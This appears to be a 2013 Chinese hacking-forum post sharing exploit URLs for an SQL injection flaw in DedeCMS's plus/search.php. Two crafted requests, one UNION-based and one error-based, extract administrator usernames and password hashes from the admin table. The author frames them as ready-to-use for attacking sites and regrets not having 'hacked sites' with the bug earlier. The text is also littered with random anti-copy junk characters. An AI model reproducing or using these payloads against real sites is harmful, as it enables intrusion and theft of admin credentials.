找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2041|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ* s2 W( y5 M) w5 S
2 P$ o- l1 J/ E7 T" `  p
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
' {/ X+ d# j. |7 I& _3 \4 f6 J! I( q  y0 g
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
1 q5 W9 N* i$ t7 h$ g+ w$ j2 U) I- r8 s" Y* W
我一般是这样测试的:
1 b; N: ?3 j  E) n, y& Y. v. I5 R9 t5 h4 q
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
# T; Z! v! S! N- T$ H  T2 j5 v8 f
8 E  T% q9 O5 z转载不加作者名的没JJ
4 g( }8 i. f. K6 V! ~3 d/ {3 O2 o1 r8 E; |9 K
作者:鬼哥; d: p8 h2 B8 s3 D! Z

7 I$ K3 b. m& ] : h! ^2 ~, ?  u6 P

0 m/ {! m' ^! J% R5 b; i. d看结果如果提示4 `; v! a! y7 W" l- [( i: k7 z

. T  [3 g: Y. Q4 @" |  f& `Safe Alert: Request Error step 2 !  _, y3 I+ F+ T5 R" ]2 o

2 [8 f( W6 W2 [5 d0 j1 \8 r那么直接用下面的exp
2 a! i" [) n8 f* \, \. X- B: x
$ D+ {% x5 W; J2 Exx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
4 `9 F# y4 u5 o; {& z% d& ]% W
- K+ p8 ]% I$ q& X" k' i* r7 n
2 W4 Z6 k! L9 L  z' v2 u% B看结果如果提示, A" b9 l6 O! t

" x6 R) h  i$ dSafe Alert: Request Error step 1 !5 r  y, r3 F" c) o0 k- n6 q

' h+ K% o5 n# X( H/ {; {/ u& ~, Y2 q0 [那么直接用下面的exp
5 }4 w) g5 z- O; h7 j; `8 D* G- t
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
0 r) ~5 D) b" ~8 h" p  e+ T# e. z% G  e( Q
; d/ s0 `# d% J7 E' c
如果正常显示证明漏洞不存在了。; R/ A! k( ~9 g6 Z' R( I

8 ?# t. z* k4 a3 |转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表